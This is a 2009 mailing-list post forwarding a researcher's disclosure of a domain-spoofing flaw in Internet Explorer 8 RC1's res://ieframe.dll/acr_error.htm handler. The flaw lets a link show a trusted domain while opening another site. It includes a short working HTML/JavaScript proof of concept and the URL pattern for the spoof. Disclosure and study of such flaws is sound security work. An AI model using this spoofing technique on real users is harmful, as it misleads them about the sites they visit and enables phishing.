Fwd: ie8 spooff the domain name in ieframe.dll wen is set to acr_error.htm in res: uri handler
32 views
Skip to first unread message
Lostmon lords
Mar 5, 2009, 4:09:33 AM3/5/09
to vu...@secwatch.co.uk, moder...@osvdb.org, bu...@securitytracker.com, vu...@securityfocus.com, vu...@secunia.com, vu...@k-otik.com, submi...@packetstormsecurity.org, ne...@securiteam.com, xfo...@iss.net, ale...@zataz.net, Vu...@frsirt.com, los...@googlegroups.com
###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
Advisore:http://lostmon.blogspot.com/
2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
vendor notify:yes exploit available:yes
############################################
Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)
#################
Proof of concept
#################
<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>
<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>
</html>
#######################################
Thnx To estrella to be my ligth
Thnx to all Lostmon Team
---------- Forwarded message ----------
From: Lostmon lords <los...@gmail.com>
Date: 2009/3/4
Subject: ie8 spooff the domain name in ieframe.dll wen is set to acr_error.htm in res: uri handler
To: Microsoft Security Response Center <sec...@microsoft.com>
--
atentamente:
Lostmon (los...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
From: Lostmon lords <los...@gmail.com>
Date: 2009/3/4
Subject: ie8 spooff the domain name in ieframe.dll wen is set to acr_error.htm in res: uri handler
To: Microsoft Security Response Center <sec...@microsoft.com>
Hello
Internet explorer 8 has a flaw that allows remote users to spooff the domain name in ieframe.dll wen is set to acr_error.htm in res: uri handler
a remote user can compose a malicious link thats shows in domain name for example google.com , but wen click in the link it goes to other site (spooff)
res://ieframe.dll/acr_error.htm#[trusted domain],[attackers site]
see attached file as a PoC.
res://ieframe.dll/acr_error.htm
I test it in windows 2003 and winxp pro&home with ie 7 and it does not work it apears that its affects only IE8
Thnx for your time !!!!
--
atentamente:
Lostmon (los...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
--
atentamente:
Lostmon (los...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Reply all
Reply to author
Forward
0 new messages